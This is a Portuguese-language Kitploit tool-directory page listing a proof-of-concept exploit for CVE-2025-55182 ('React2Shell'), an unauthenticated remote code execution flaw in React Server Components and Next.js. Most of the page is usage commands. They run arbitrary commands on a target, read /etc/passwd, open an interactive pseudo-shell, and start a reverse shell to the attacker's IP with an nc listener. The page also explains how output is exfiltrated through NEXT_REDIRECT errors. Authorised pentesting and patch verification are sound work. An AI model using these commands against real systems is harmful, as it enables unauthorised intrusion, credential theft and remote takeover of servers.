Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
react2shell-poc — CVE-2025-55182 React2Shell PoC - RCE crítico em React Server Components / Next.js. CVSS 10.0. Exfiltração baseada em erros, reverse shell, modo interativo. | Kitploit
Ferramentas/GitHubGitHub/p3ta00/react2shell-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubp3ta00/react2shell-poc

react2shell-poc

CVE-2025-55182 React2Shell PoC - RCE crítico em React Server Components / Next.js. CVSS 10.0. Exfiltração baseada em erros, reverse shell, modo interativo.

912há 3 mesesAinda não revisado
Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

React2Shell - PoC da CVE-2025-55182

Prova de Conceito para CVE-2025-55182, uma vulnerabilidade crítica de Execução Remota de Código não autenticada em React Server Components.

Pontuação CVSS: 10.0 (Crítico)

Vulnerabilidade

A vulnerabilidade existe no desserializador do protocolo Flight do React. Ao explorar poluição de protótipo por meio de payloads especialmente criados, um atacante pode alcançar execução de código arbitrário em aplicações Next.js vulneráveis.

Versões Afetadas

ProdutoVulnerávelCorrigido
React19.0.0 - 19.2.019.0.1, 19.1.2, 19.2.1+
Next.js14.3.0-canary.77 - 16.x15.0.5, 15.1.9, 15.2.6, 16.0.7+

Instalação

root@kitploit:~
git clone https://github.com/p3ta00/react2shell-poc.git
cd react2shell-poc
pip install requests

Uso

Execução de Comando com Saída (Padrão - Exfiltração Baseada em Erro)

A saída é retornada diretamente na resposta HTTP via erro NEXT_REDIRECT - nenhum servidor de callback necessário.

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"
python3 react2shell-poc.py -t http://TARGET:3000 -c "cat /etc/passwd"

Modo Interativo

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -i

Verificar Vulnerabilidade

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 --check

RCE Cego (Sem Saída)

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "touch /tmp/pwned" --blind

Shell Reverso

root@kitploit:~
# Start listener
nc -lvnp 4444

# Send payload
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost YOUR_IP --lport 4444

Legado: Exfiltração Baseada em Callback

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id" --listen --lhost YOUR_IP

Opções

root@kitploit:~
-t, --target       URL do alvo (obrigatório)
-c, --command      Comando a executar (saída via exfiltração baseada em erro por padrão)
--check            Verificar se o alvo está vulnerável
--blind            Modo RCE cego (sem captura de saída)
--listen           Usar servidor de callback em vez de exfiltração baseada em erro
-i, --interactive  Modo pseudo-shell interativo
--revshell         Tentar shell reverso
--lhost            IP do atacante para callbacks/shell reverso
--lport            Porta de callback (padrão: 9999)
--callback         URL de callback manual
--timeout          Tempo limite da requisição em segundos (padrão: 30)

Como Funciona

O método de exfiltração padrão usa injeção de erro NEXT_REDIRECT:

  1. Executar comando e capturar saída
  2. Lançar um erro NEXT_REDIRECT com saída no campo digest
  3. Next.js serializa o erro na resposta Flight
  4. A saída aparece diretamente no corpo da resposta HTTP

Isso é mais confiável do que a exfiltração baseada em callback porque não requer acesso de rede de saída do alvo.

Referências

  • Wiz Security - Divulgação do React2Shell
  • Análise do Datadog Security Labs
  • NVD - CVE-2025-55182

Aviso Legal

Esta ferramenta é apenas para testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Sempre obtenha a devida autorização antes de testar.

Autor

p3ta

Baixar ferramenta